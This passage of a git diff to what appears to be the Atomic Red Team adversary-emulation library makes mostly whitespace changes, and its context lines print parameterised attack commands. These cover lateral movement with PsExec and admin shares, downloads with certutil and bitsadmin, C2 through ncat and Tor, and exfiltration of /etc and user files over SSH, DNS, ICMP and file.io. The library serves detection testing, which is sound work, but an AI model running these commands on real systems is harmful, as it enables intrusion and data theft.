Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
@@ -72087,7 +72087,7 @@ lateral-movement:
net start sesshijack
cleanup_command: 'sc.exe delete sesshijack >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
T1021.001:
@@ -72159,7 +72159,7 @@ lateral-movement:
auto_generated_guid: 355d4632-8cb9-449d-91ce-b566d0253d3e
description: 'Attempt an RDP session via Remote Desktop Application to a DomainController.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -72182,15 +72182,15 @@ lateral-movement:
dependencies:
- description: 'Computer must be domain joined
-'
+ '
prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain)
{ exit 0} else { exit 1}
-'
+ '
get_prereq_command: 'Write-Host Joining this computer to a domain must be
done manually
-'
+ '
executor:
command: |
$Server=#{logonserver}
@@ -72207,7 +72207,7 @@ lateral-movement:
auto_generated_guid: 7382a43e-f19c-46be-8f09-5c63af7d3e2b
description: 'Attempt an RDP session via Remote Desktop Application over Powershell
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -72240,7 +72240,7 @@ lateral-movement:
description: 'Changing RDP Port to Non Standard Port via Remote Desktop Application
over Powershell
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -72264,7 +72264,7 @@ lateral-movement:
auto_generated_guid: 74ace21e-a31c-4f7d-b540-53e4eb6d1f73
description: 'Changing RDP Port to Non Standard Port via Command_Prompt
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -72585,7 +72585,7 @@ lateral-movement:
auto_generated_guid: 3386975b-367a-4fbb-9d77-4dcf3639ffd3
description: 'Connecting To Remote Shares
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -72609,13 +72609,13 @@ lateral-movement:
command: 'cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password}
/u:#{user_name}"
-'
+ '
name: command_prompt
- name: Map Admin Share PowerShell
auto_generated_guid: 514e9cd7-9207-4882-98b1-c8f791bae3c5
description: 'Map Admin share utilizing PowerShell
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -72634,14 +72634,14 @@ lateral-movement:
executor:
command: 'New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
-'
+ '
name: powershell
- name: Copy and Execute File with PsExec
auto_generated_guid: 0eb03d41-79e4-4393-8e57-6344856be1cf
description: 'Copies a file to a remote host and executes it using PsExec. Requires
the download of PsExec from [https://docs.microsoft.com/en-us/sysinternals/downloads/psexec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec).
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -72662,10 +72662,10 @@ lateral-movement:
- description: 'PsExec tool from Sysinternals must exist on disk at specified
location (#{psexec_exe})
-'
+ '
prereq_command: 'if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1}
-'
+ '
get_prereq_command: |
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
@@ -72695,7 +72695,7 @@ lateral-movement:
command: 'cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file}
2>&1
-'
+ '
name: command_prompt
elevation_required: true
T1021.004:
@@ -72928,7 +72928,7 @@ lateral-movement:
description: 'An adversary may use Radmin Viewer Utility to remotely control
Windows device, this will start the radmin console.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -72944,10 +72944,10 @@ lateral-movement:
- description: 'Radmin Viewer Utility must be installed at specified location
(#{radmin_exe})
-'
+ '
prereq_command: 'if not exist "#{radmin_exe}" (exit /b 1)
-'
+ '
get_prereq_command: |
echo Downloading radmin installer
bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer}
@@ -73305,7 +73305,7 @@ lateral-movement:
executor:
command: 'Enable-PSRemoting -Force
-'
+ '
name: powershell
elevation_required: true
- name: Invoke-Command
@@ -73328,7 +73328,7 @@ lateral-movement:
executor:
command: 'invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}}
-'
+ '
name: powershell
- name: WinRM Access with Evil-WinRM
auto_generated_guid: efe86d95-44c4-4509-ae42-7bfd9d1f5b3d
@@ -73689,7 +73689,7 @@ command-and-control:
"#{query_type}" "#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}"
-QuickTimeout}
-'
+ '
name: powershell
- name: DNS Regular Beaconing
auto_generated_guid: 3efc144e-1af8-46bb-8ca2-1376bb6db8b6
@@ -74487,7 +74487,7 @@ command-and-control:
auto_generated_guid: 0fc6e977-cb12-44f6-b263-2824ba917409
description: 'Utilize rsync to perform a remote file copy (push)
-'
+ '
supported_platforms:
- linux
- macos
@@ -74511,13 +74511,13 @@ command-and-control:
executor:
command: 'rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path}
-'
+ '
name: bash
- name: rsync remote file copy (pull)
auto_generated_guid: 3180f7d5-52c0-4493-9ea0-e3431a84773f
description: 'Utilize rsync to perform a remote file copy (pull)
-'
+ '
supported_platforms:
- linux
- macos
@@ -74541,13 +74541,13 @@ command-and-control:
executor:
command: 'rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path}
-'
+ '
name: bash
- name: scp remote file copy (push)
auto_generated_guid: 83a49600-222b-4866-80a0-37736ad29344
description: 'Utilize scp to perform a remote file copy (push)
-'
+ '
supported_platforms:
- linux
- macos
@@ -74571,13 +74571,13 @@ command-and-control:
executor:
command: 'scp #{local_file} #{username}@#{remote_host}:#{remote_path}
-'
+ '
name: bash
- name: scp remote file copy (pull)
auto_generated_guid: b9d22b9a-9778-4426-abf0-568ea64e9c33
description: 'Utilize scp to perform a remote file copy (pull)
-'
+ '
supported_platforms:
- linux
- macos
@@ -74601,13 +74601,13 @@ command-and-control:
executor:
command: 'scp #{username}@#{remote_host}:#{remote_file} #{local_path}
-'
+ '
name: bash
- name: sftp remote file copy (push)
auto_generated_guid: f564c297-7978-4aa9-b37a-d90477feea4e
description: 'Utilize sftp to perform a remote file copy (push)
-'
+ '
supported_platforms:
- linux
- macos
@@ -74631,13 +74631,13 @@ command-and-control:
executor:
command: 'sftp #{username}@#{remote_host}:#{remote_path} <<< $''put #{local_file}''
-'
+ '
name: bash
- name: sftp remote file copy (pull)
auto_generated_guid: '0139dba1-f391-405e-a4f5-f3989f2c88ef'
description: 'Utilize sftp to perform a remote file copy (pull)
-'
+ '
supported_platforms:
- linux
- macos
@@ -74661,14 +74661,14 @@ command-and-control:
executor:
command: 'sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
-'
+ '
name: bash
- name: certutil download (urlcache)
auto_generated_guid: dd3b61dd-7bbc-48cd-ab51-49ad1a776df0
description: 'Use certutil -urlcache argument to download a file from the web.
Note - /urlcache also works!
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -74683,17 +74683,17 @@ command-and-control:
executor:
command: 'cmd /c certutil -urlcache -split -f #{remote_file} #{local_path}
-'
+ '
cleanup_command: 'del #{local_path} >nul 2>&1
-'
+ '
name: command_prompt
- name: certutil download (verifyctl)
auto_generated_guid: ffd492e3-0455-4518-9fb1-46527c9f241b
description: 'Use certutil -verifyctl argument to download a file from the web.
Note - /verifyctl also works!
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -74715,7 +74715,7 @@ command-and-control:
cleanup_command: 'Remove-Item "certutil-$(Get-Date -format yyyy_MM_dd)" -Force
-Recurse -ErrorAction Ignore
-'
+ '
name: powershell
- name: Windows - BITSAdmin BITS Download
auto_generated_guid: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b
@@ -74741,7 +74741,7 @@ command-and-control:
command: 'C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority
HIGH #{remote_file} #{local_path}
-'
+ '
name: command_prompt
- name: Windows - PowerShell Download
auto_generated_guid: 42dc4460-9aa6-45d3-b1a6-3955d34e1fe8
@@ -74763,17 +74763,17 @@ command-and-control:
command: '(New-Object System.Net.WebClient).DownloadFile("#{remote_file}",
"#{destination_path}")
-'
+ '
cleanup_command: 'Remove-Item #{destination_path} -Force -ErrorAction Ignore
-'
+ '
name: powershell
- name: OSTAP Worming Activity
auto_generated_guid: 2ca61766-b456-4fcf-a35a-1233685e1cad
description: 'OSTap copies itself in a specfic way to shares and secondary drives.
This emulates the activity.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -74850,7 +74850,7 @@ command-and-control:
auto_generated_guid: c99a829f-0bb8-4187-b2c6-d47d1df74cab
description: 'Download a remote file using the whois utility
-'
+ '
supported_platforms:
- linux
- macos
@@ -74878,29 +74878,29 @@ command-and-control:
dependencies:
- description: 'The whois and timeout commands must be present
-'
+ '
prereq_command: 'which whois && which timeout
-'
+ '
get_prereq_command: 'echo "Please install timeout and the whois package"
-'
+ '
executor:
name: sh
elevation_required: false
command: 'timeout --preserve-status #{timeout} whois -h #{remote_host} -p
#{remote_port} "#{query}" > #{output_file}
-'
+ '
cleanup_command: 'rm -f #{output_file}
-'
+ '
- name: File Download via PowerShell
auto_generated_guid: 54a4daf1-71df-4383-9ba7-f1a295d8b6d2
description: 'Use PowerShell to download and write an arbitrary file from the
internet. Example is from the 2021 Threat Detection Report by Red Canary.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -74934,7 +74934,7 @@ command-and-control:
name: command_prompt
command: 'finger base64_filedata@#{remote_host}
-'
+ '
- name: Download a file with IMEWDBLD.exe
auto_generated_guid: 1a02df58-09af-4064-a765-0babe1a0d1e2
description: |
@@ -74982,10 +74982,10 @@ command-and-control:
dependencies:
- description: 'Curl must be installed on system.
-'
+ '
prereq_command: 'if (Test-Path #{curl_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile $env:temp\curl.zip
Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl
@@ -75028,10 +75028,10 @@ command-and-control:
dependencies:
- description: 'Curl must be installed on system.
-'
+ '
prereq_command: 'if (Test-Path #{curl_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
Invoke-WebRequest “https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip” -Outfile $env:temp\curl.zip
Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl
@@ -75040,13 +75040,13 @@ command-and-control:
Remove-Item $env:temp\curl.zip
- description: 'A file must be created to upload
-'
+ '
prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'echo "This is an Atomic Test File" > #{file_path}
-'
+ '
executor:
command: |
#{curl_path} -T #{file_path} #{remote_destination}
@@ -75144,7 +75144,7 @@ command-and-control:
executor:
command: 'export #{proxy_scheme}_proxy=#{proxy_server}
-'
+ '
cleanup_command: |
unset http_proxy
unset https_proxy
@@ -75397,31 +75397,31 @@ command-and-control:
dependencies:
- description: 'The proxy settings backup file must exist on disk at $env:Temp\proxy-backup.txt
-'
+ '
prereq_command: 'if (Test-Path $env:Temp\proxy-backup.txt) {exit 0} else {exit
1}
-'
+ '
get_prereq_command: |
if(-not (test-path $env:Temp\proxy-backup.txt)){
$Proxy = (Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings' -Name "ProxyServer" -ErrorAction Ignore).ProxyServer
Set-Content $env:Temp\proxy-backup.txt $Proxy}
- description: 'The Psiphon executable must exist in the Downloads folder
-'
+ '
prereq_command: 'if (Test-Path $env:UserProfile\Downloads\psiphon3.exe) {exit
0} else {exit 1}
-'
+ '
get_prereq_command: 'Invoke-WebRequest -OutFile "$env:UserProfile\Downloads\psiphon3.exe"
"https://s3.amazonaws.com/0ubz-2q11-gi9y/psiphon3.exe"
-'
+ '
executor:
name: powershell
command: 'PathToAtomicsFolder\T1090.003\src\Psiphon.bat
-'
+ '
cleanup_command: "$Proxy = Get-Content $env:Temp\\proxy-backup.txt -ErrorAction
Ignore\nif($null -ne $Proxy) \n{Set-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet
Settings' -Name \"ProxyServer\" -Value $Proxy}\n"
@@ -75444,7 +75444,7 @@ command-and-control:
- description: "tor.exe must be installed on the machine \n"
prereq_command: 'if (Test-Path #{TorExe}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
Start-BitsTransfer -Source "https://archive.torproject.org/tor-package-archive/torbrowser/11.0.6/tor-win32-0.4.6.9.zip" -Destination "$env:temp\tor.zip" -dynamic
expand-archive -LiteralPath "$env:temp\tor.zip" -DestinationPath "$env:temp\tor"
@@ -75469,15 +75469,15 @@ command-and-control:
prereq_command: 'if [ -x "$(command -v tor --version)" ]; then exit 0; else
exit 1; fi
-'
+ '
get_prereq_command: 'sudo apt-get -y install tor
-'
+ '
executor:
command: "sudo systemctl start tor \n"
cleanup_command: 'sudo systemctl stop tor
-'
+ '
name: sh
- name: Tor Proxy Usage - MacOS
auto_generated_guid: 12631354-fdbc-4164-92be-402527e748da
@@ -75493,17 +75493,17 @@ command-and-control:
prereq_command: 'if [ -x "$(command -v tor --version)" ]; then exit 0; else
exit 1; fi
-'
+ '
get_prereq_command: |
if [ ! -x "$(command -v brew --version)" ]; then /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh keystroke return)"; fi
brew install tor
executor:
command: 'osascript -e ''tell application "Terminal" to do script "tor"''
-'
+ '
cleanup_command: 'killall tor > /dev/null 2>&1
-'
+ '
name: sh
T1026:
technique:
@@ -75657,10 +75657,10 @@ command-and-control:
dependencies:
- description: 'ncat.exe must be available at specified location (#{ncat_exe})
-'
+ '
prereq_command: 'if( Test-Path "#{ncat_exe}") {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -ItemType Directory -Force -Path #{ncat_path} | Out-Null
@@ -75674,7 +75674,7 @@ command-and-control:
executor:
command: 'cmd /c #{ncat_exe} #{server_ip} #{server_port}
-'
+ '
name: powershell
- name: Powercat C2
auto_generated_guid: 3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e
@@ -75823,13 +75823,13 @@ command-and-control:
executor:
command: 'Test-NetConnection -ComputerName #{domain} -port #{port}
-'
+ '
name: powershell
- name: Testing usage of uncommonly used port
auto_generated_guid: 5db21e1d-dd9c-4a50-b885-b1e748912767
description: 'Testing uncommonly used port utilizing telnet.
-'
+ '
supported_platforms:
- linux
- macos
@@ -75845,7 +75845,7 @@ command-and-control:
executor:
command: 'telnet #{domain} #{port}
-'
+ '
name: sh
T1102.003:
technique:
@@ -76087,7 +76087,7 @@ command-and-control:
-Minimum 1 -Maximum 999999).#{domain}&type=#{query_type}" -UseBasicParsing).Content
}
-'
+ '
name: powershell
- name: DNS over HTTPS Regular Beaconing
auto_generated_guid: 0c5f9705-c575-42a6-9609-cbbff4b2fc9b
@@ -76277,7 +76277,7 @@ command-and-control:
and using this to maintain access to the machine. Download of TeamViewer installer
will be at the destination location when sucessfully executed.
-'
+ '
supported_platforms:
- windows
executor:
@@ -76298,7 +76298,7 @@ command-and-control:
and use to establish C2. Download of AnyDesk installer will be at the destination
location and ran when sucessfully executed.
-'
+ '
supported_platforms:
- windows
executor:
@@ -76317,7 +76317,7 @@ command-and-control:
and use to establish C2. Download of LogMeIn installer will be at the destination
location and ran when sucessfully executed.
-'
+ '
supported_platforms:
- windows
executor:
@@ -76337,7 +76337,7 @@ command-and-control:
and use to establish C2. Download of GoToAssist installer will be at the destination
location and ran when sucessfully executed.
-'
+ '
supported_platforms:
- windows
executor:
@@ -76381,21 +76381,21 @@ command-and-control:
dependencies:
- description: 'Ammyy Admin must exist on disk at the specified location (#{Ammyy_Admin_Path})
-'
+ '
prereq_command: 'if (Test-Path #{Ammyy_Admin_Path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Start-BitsTransfer -Source "https://web.archive.org/web/20140625232737/http://www.ammyy.com/AA_v3.exe"
-Destination "$env:temp\ammyy.exe" -dynamic
-'
+ '
executor:
command: 'Start-Process #{Ammyy_Admin_Path}
-'
+ '
cleanup_command: 'Stop-Process -Name "Ammyy" -force -erroraction silentlycontinue
-'
+ '
name: powershell
elevation_required: true
- name: RemotePC Software Execution
@@ -76414,18 +76414,18 @@ command-and-control:
dependencies:
- description: 'RemotePC must exist on disk at the specified location (#{RemotePC_Path})
-'
+ '
prereq_command: 'if (Test-Path #{RemotePC_Path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Start-BitsTransfer -Source "https://static.remotepc.com/downloads/rpc/140422/RemotePC.exe"
-Destination "#{RemotePC_Path}" -dynamic
-'
+ '
executor:
command: 'Start-Process #{RemotePC_Path}
-'
+ '
cleanup_command: "Unregister-ScheduledTask -TaskName \"RemotePC\" -Confirm:$False
-ErrorAction SilentlyContinue\nUnregister-ScheduledTask -TaskName \"RPCServiceHealthCheck\"
-Confirm:$False -ErrorAction SilentlyContinue\nUnregister-ScheduledTask
@@ -76497,7 +76497,7 @@ command-and-control:
auto_generated_guid: 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25
description: 'Utilizing a common technique for posting base64 encoded data.
-'
+ '
supported_platforms:
- macos
- linux
@@ -76803,7 +76803,7 @@ command-and-control:
- description: "Curl must be installed on system \n"
prereq_command: 'if (Test-Path #{curl_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
Invoke-WebRequest "https://curl.haxx.se/windows/dl-7.71.1/curl-7.71.1-win32-mingw.zip" -Outfile $env:temp\curl.zip
Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl
@@ -77008,7 +77008,7 @@ exfiltration:
auto_generated_guid: ab936c51-10f4-46ce-9144-e02137b2016a
description: 'Take a file/directory, split it into 5Mb chunks
-'
+ '
supported_platforms:
- macos
- linux
@@ -77027,12 +77027,12 @@ exfiltration:
prereq_command: 'if [ ! -f #{folder_path}/#{file_name} ]; then exit 1; else
exit 0; fi;
-'
+ '
get_prereq_command: 'if [ ! -d #{folder_path} ]; then mkdir -p #{folder_path};
touch #{folder_path}/safe_to_delete; fi; dd if=/dev/urandom of=#{folder_path}/#{file_name}
bs=25000000 count=1
-'
+ '
executor:
command: |
cd #{folder_path}; split -b 5000000 #{file_name}
@@ -77040,7 +77040,7 @@ exfiltration:
cleanup_command: 'if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path};
fi;
-'
+ '
name: sh
T1048:
technique:
@@ -77126,7 +77126,7 @@ exfiltration:
executor:
command: 'ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
-'
+ '
name: sh
- name: Exfiltration Over Alternative Protocol - SSH
auto_generated_guid: 7c3cb337-35ae-4d06-bf03-3032ed2ec268
@@ -77156,7 +77156,7 @@ exfiltration:
command: 'tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh
#{user_name}@#{domain} ''cat > /Users.tar.gz.enc''
-'
+ '
name: sh
- name: DNSExfiltration (doh)
auto_generated_guid: c943d285-ada3-45ca-b3aa-7cd6500c6a48
@@ -77198,14 +77198,14 @@ exfiltration:
- description: 'DNSExfiltrator powershell file must exist on disk at specified
location (#{ps_module})
-'
+ '
prereq_command: 'if (Test-Path #{ps_module}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'IWR "https://raw.githubusercontent.com/Arno0x/DNSExfiltrator/8faa972408b0384416fffd5b4d42a7aa00526ca8/Invoke-DNSExfiltrator.ps1"
-OutFile #{ps_module}
-'
+ '
executor:
command: |
Import-Module #{ps_module}
@@ -77271,7 +77271,7 @@ exfiltration:
auto_generated_guid: 1cdf2fb0-51b6-4fd8-96af-77020d5f1bf0
description: 'Exfiltrate data HTTPS using curl to file share site file.io
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -77287,10 +77287,10 @@ exfiltration:
dependencies:
- description: 'Curl must be installed on system.
-'
+ '
prereq_command: 'if (Test-Path #{curl_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile $env:temp\curl.zip
Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl
@@ -77306,7 +77306,7 @@ exfiltration:
auto_generated_guid: 4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01
description: 'Exfiltrate data HTTPS using curl to file share site file.io
-'
+ '
supported_platforms:
- macos
- linux
@@ -77409,7 +77409,7 @@ exfiltration:
auto_generated_guid: d1253f6e-c29b-49dc-b466-2147a6191932
description: 'Exfiltrates a file present on the victim machine to the C2 server.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -77666,13 +77666,13 @@ exfiltration:
in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}",
1500, $Data) }
-'
+ '
name: powershell
- name: Exfiltration Over Alternative Protocol - DNS
auto_generated_guid: c403b5a4-b5fc-49f2-b181-d1c80d27db45
description: 'Exfiltration of specified file over DNS protocol.
-'
+ '
supported_platforms:
- linux
executor:
@@ -77717,7 +77717,7 @@ exfiltration:
command: 'Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1048.003
Atomic Test" -Attachments #{input_file} -SmtpServer #{smtp_server}
-'
+ '
name: powershell
input_arguments:
input_file:
@@ -78127,7 +78127,7 @@ initial-access:
description: 'GCP Service Accounts can be used to gain intial access as well
as maintain persistence inside Google Cloud.
-'
+ '
supported_platforms:
- google-workspace
- windows
@@ -78162,20 +78162,20 @@ initial-access:
cleanup_command: 'gcloud iam service-accounts delete #{service-account-email}
--quiet
-'
+ '
dependency_executor_name: gcloud
dependencies:
- description: 'Requires gcloud
-'
+ '
prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit
1; fi;
-'
+ '
get_prereq_command: 'echo "Please Install Google Cloud SDK before running
this atomic test : https://cloud.google.com/sdk/docs/install"
-'
+ '
T1195.003:
technique:
object_marking_refs:
@@ -78413,7 +78413,7 @@ initial-access:
description: 'The Adversaries can activate the default Guest user. The guest
account is inactivated by default
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -78424,10 +78424,10 @@ initial-access:
executor:
command: 'net user #{guest_user} /active:yes
-'
+ '
cleanup_command: 'net user #{guest_user} /active:no
-'
+ '
name: command_prompt
elevation_required: true
T1078.002:
@@ -78763,7 +78763,7 @@ initial-access:
description: 'Running Chrome VPN Extensions via the Registry install 2 vpn extension,
please see "T1133\src\list of vpn extension.txt" to view complete list
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -78776,12 +78776,12 @@ initial-access:
type: String
default: '"fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme"
-'
+ '
dependency_executor_name: powershell
dependencies:
- description: 'Chrome must be installed
-'
+ '
prereq_command: if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe")
-Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"))
{exit 0} else {exit 1}
@@ -79173,7 +79173,7 @@ initial-access:
cleanup_command: 'Remove-Item $env:TEMP\PhishingAttachment.xlsm -ErrorAction
Ignore
-'
+ '
- name: Word spawned a command shell and used an IP address in the command line
auto_generated_guid: cbb6799a-425c-4f83-9194-5447a909d67f
description: |
@@ -79185,7 +79185,7 @@ initial-access:
jse_path:
description: 'Path for the macro to write out the "malicious" .jse file
-'
+ '
type: String
default: C:\Users\Public\art.jse
ms_product:
@@ -79196,7 +79196,7 @@ initial-access:
dependencies:
- description: 'Microsoft #{ms_product} must be installed
-'
+ '
prereq_command: |
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -79207,7 +79207,7 @@ initial-access:
get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
manually to meet this requirement"
-'
+ '
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -79216,7 +79216,7 @@ initial-access:
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore
-'
+ '
name: powershell
T1566.002:
technique:
diff --git a/atomics/T1114.001/T1114.001.md b/atomics/T1114.001/T1114.001.md
index e641d3bc..d90cc8b1 100644
--- a/atomics/T1114.001/T1114.001.md
+++ b/atomics/T1114.001/T1114.001.md
@@ -55,7 +55,7 @@ if (Test-Path #{file_path}\Get-Inbox.ps1) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/src/Get-Inbox.ps1" -OutFile "#{file_path}\Get-Inbox.ps1"
+Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1114.001/src/Get-Inbox.ps1" -OutFile "#{file_path}\Get-Inbox.ps1"
```